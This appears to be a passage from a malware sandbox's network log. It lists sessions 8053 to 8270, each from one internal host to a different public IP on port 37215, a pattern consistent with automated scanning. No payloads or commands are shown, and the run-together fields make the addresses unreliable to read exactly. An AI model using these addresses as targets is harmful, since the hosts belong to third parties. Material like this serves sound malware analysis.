                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8053192.168.2.2341566197.139.208.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8054192.168.2.2357568197.112.11.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8055192.168.2.2357806157.15.211.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8056192.168.2.2337318105.122.125.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8057192.168.2.2339634197.113.192.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8058192.168.2.233598632.149.234.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8059192.168.2.2336360106.112.111.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8060192.168.2.235212641.207.141.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8061192.168.2.235081441.222.229.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8062192.168.2.2341308170.204.84.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8063192.168.2.2350168197.117.147.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8064192.168.2.2355304157.66.180.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8065192.168.2.2338478197.17.184.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8066192.168.2.235037240.124.182.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8067192.168.2.236084041.98.125.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8068192.168.2.2354166157.94.251.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8069192.168.2.2339800157.197.153.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8070192.168.2.2335378150.23.25.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8071192.168.2.2354832197.50.152.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8072192.168.2.2335700142.70.72.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8073192.168.2.2335150157.143.189.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8074192.168.2.2333810157.129.53.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8075192.168.2.2360732157.142.68.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8076192.168.2.235059841.165.95.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8077192.168.2.235725441.217.9.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8078192.168.2.234083249.105.167.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8079192.168.2.2336672157.106.144.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8080192.168.2.2336564157.211.32.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8081192.168.2.236033041.95.203.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8082192.168.2.2345546197.74.254.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8083192.168.2.2349262157.163.208.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8084192.168.2.233917498.117.29.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8085192.168.2.2352724168.6.0.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8086192.168.2.234457054.87.136.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8087192.168.2.235792417.164.171.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8088192.168.2.2347436197.61.178.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8089192.168.2.2336746194.3.121.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8090192.168.2.235765423.61.50.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8091192.168.2.2347132197.210.67.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8092192.168.2.2354312157.42.114.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8093192.168.2.2338038197.197.133.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8094192.168.2.2349582105.201.114.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8095192.168.2.2340716157.7.151.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8096192.168.2.234406441.200.191.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8097192.168.2.2345078198.127.74.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8098192.168.2.234131041.1.85.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8099192.168.2.2352672197.117.88.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8100192.168.2.234953418.160.12.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8101192.168.2.2358580197.125.132.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8102192.168.2.234674674.79.164.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8103192.168.2.2348994157.84.91.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8104192.168.2.2356496157.9.208.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8105192.168.2.2357448197.192.219.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8106192.168.2.2348318163.164.87.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8107192.168.2.2338712197.180.213.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8108192.168.2.2341200181.37.204.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8109192.168.2.2346154153.151.0.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8110192.168.2.235122841.130.195.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8111192.168.2.2355552157.54.176.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8112192.168.2.235253641.1.199.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8113192.168.2.2354464157.59.203.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8114192.168.2.2332974197.126.235.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8115192.168.2.2353284197.233.208.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8116192.168.2.236038441.197.16.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8117192.168.2.2334098162.31.73.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8118192.168.2.2350494157.27.183.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8119192.168.2.2355276157.179.247.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8120192.168.2.2336780197.170.221.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8121192.168.2.234488841.6.158.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8122192.168.2.2344890180.4.3.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8123192.168.2.233688296.31.38.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8124192.168.2.235347841.106.58.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8125192.168.2.2336500157.187.18.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8126192.168.2.2353436197.169.246.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8127192.168.2.2344860197.252.110.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8128192.168.2.2335886197.178.130.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8129192.168.2.2346642197.108.134.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8130192.168.2.2348698157.233.2.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8131192.168.2.2356262197.101.61.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8132192.168.2.2349242197.102.105.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8133192.168.2.2359712197.33.246.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8134192.168.2.235945441.91.67.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8135192.168.2.2359390192.20.33.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8136192.168.2.233918641.251.80.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8137192.168.2.234733841.161.212.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8138192.168.2.2356542197.175.64.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8139192.168.2.2342872157.139.13.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8140192.168.2.2356938197.3.207.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8141192.168.2.233907441.170.98.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8142192.168.2.2344972157.92.174.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8143192.168.2.2351574157.231.130.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8144192.168.2.2351784183.198.1.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8145192.168.2.2340022154.178.120.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8146192.168.2.2347422197.236.179.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8147192.168.2.2341642197.161.153.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8148192.168.2.2351368197.198.96.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8149192.168.2.2348936208.182.3.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8150192.168.2.2350502197.96.179.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8151192.168.2.2348230157.211.54.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8152192.168.2.2352978176.198.69.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8153192.168.2.2333618152.245.53.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8154192.168.2.235261057.41.93.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8155192.168.2.2348572197.247.71.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8156192.168.2.2354582197.73.210.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8157192.168.2.2359004157.21.137.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8158192.168.2.2344480211.137.16.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8159192.168.2.2335464157.44.123.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8160192.168.2.234659494.120.82.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8161192.168.2.2339476157.89.6.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8162192.168.2.2356356157.72.101.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8163192.168.2.2359284181.157.79.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8164192.168.2.2353472197.198.142.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8165192.168.2.2334726177.108.88.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8166192.168.2.2359788157.22.239.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8167192.168.2.2342826197.19.101.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8168192.168.2.2345462189.75.124.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8169192.168.2.235035441.55.2.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8170192.168.2.2336792197.156.204.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8171192.168.2.2342588197.238.89.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8172192.168.2.2333068197.71.143.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8173192.168.2.235600241.33.234.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8174192.168.2.2342800157.211.202.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8175192.168.2.2346292157.84.80.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8176192.168.2.234226888.95.219.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8177192.168.2.2339456157.137.42.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8178192.168.2.2359856197.156.140.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8179192.168.2.2359902111.74.249.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8180192.168.2.2354696197.194.159.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8181192.168.2.2344384193.59.1.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8182192.168.2.2344794157.48.73.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8183192.168.2.2350900157.98.12.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8184192.168.2.2346390197.210.14.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8185192.168.2.2358690157.122.222.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8186192.168.2.235024841.111.4.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8187192.168.2.234222441.244.69.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8188192.168.2.234895872.37.105.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8189192.168.2.234355841.15.73.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8190192.168.2.235562244.179.115.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8191192.168.2.2359622197.160.38.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8192192.168.2.2336256157.183.207.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8193192.168.2.235640060.37.71.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8194192.168.2.2356400157.137.235.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8195192.168.2.234616485.158.240.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8196192.168.2.2339096197.154.202.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8197192.168.2.2356820157.86.61.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8198192.168.2.234644241.2.198.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8199192.168.2.2349254197.129.175.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8200192.168.2.2342606157.80.132.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8201192.168.2.2359476197.65.37.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8202192.168.2.235712464.21.179.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8203192.168.2.2332888176.110.41.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8204192.168.2.2335334157.234.7.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8205192.168.2.233901841.139.150.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8206192.168.2.2346594197.51.198.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8207192.168.2.2340080157.213.215.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8208192.168.2.2347490157.11.11.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8209192.168.2.234472641.83.94.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8210192.168.2.234003041.164.86.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8211192.168.2.2345058157.13.201.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8212192.168.2.234444841.237.171.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8213192.168.2.2333648197.197.176.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8214192.168.2.2337946105.172.23.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8215192.168.2.234339617.253.158.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8216192.168.2.234748641.72.115.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8217192.168.2.2334792197.37.104.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8218192.168.2.236015641.18.177.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8219192.168.2.2343756197.127.156.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8220192.168.2.2347664197.195.24.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8221192.168.2.2345082223.144.17.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8222192.168.2.2358962157.94.66.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8223192.168.2.235649241.82.235.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8224192.168.2.235596699.112.186.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8225192.168.2.2346546197.106.102.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8226192.168.2.2358818197.210.245.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8227192.168.2.2339256197.168.41.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8228192.168.2.2353488197.64.232.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8229192.168.2.235179041.82.216.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8230192.168.2.2359980157.68.255.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8231192.168.2.234827041.27.209.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8232192.168.2.235483066.235.114.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8233192.168.2.2359486197.180.16.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8234192.168.2.235331441.146.136.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8235192.168.2.2355664197.27.111.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8236192.168.2.2333852197.80.9.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8237192.168.2.2333862197.253.247.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8238192.168.2.2359712157.132.207.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8239192.168.2.233471041.54.111.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8240192.168.2.2340846197.220.233.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8241192.168.2.2354164197.104.74.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8242192.168.2.2357392157.31.162.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8243192.168.2.2353890157.26.19.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8244192.168.2.2352282197.83.25.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8245192.168.2.2333004197.97.53.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8246192.168.2.2357600197.196.70.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8247192.168.2.2357910152.10.69.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8248192.168.2.233900441.249.95.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8249192.168.2.235741241.255.213.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8250192.168.2.234253641.163.180.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8251192.168.2.2358556197.67.34.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8252192.168.2.2334676157.39.108.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8253192.168.2.2359252157.85.218.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8254192.168.2.2354706157.54.102.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8255192.168.2.2336202157.132.74.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8256192.168.2.235754841.30.79.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8257192.168.2.2339596197.56.142.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8258192.168.2.234641641.78.225.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8259192.168.2.2333914157.78.103.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8260192.168.2.2343388197.38.222.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8261192.168.2.234205641.46.5.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8262192.168.2.235682041.183.230.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8263192.168.2.233286441.21.2.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8264192.168.2.2357044172.240.33.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8265192.168.2.2357982197.29.243.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8266192.168.2.2345448210.113.190.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8267192.168.2.2343628157.241.178.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8268192.168.2.235138241.167.76.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8269192.168.2.2353744197.189.147.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8270192.168.2.234953496.41.140.5137215
                                          TimestampBytes transferredDirectionData


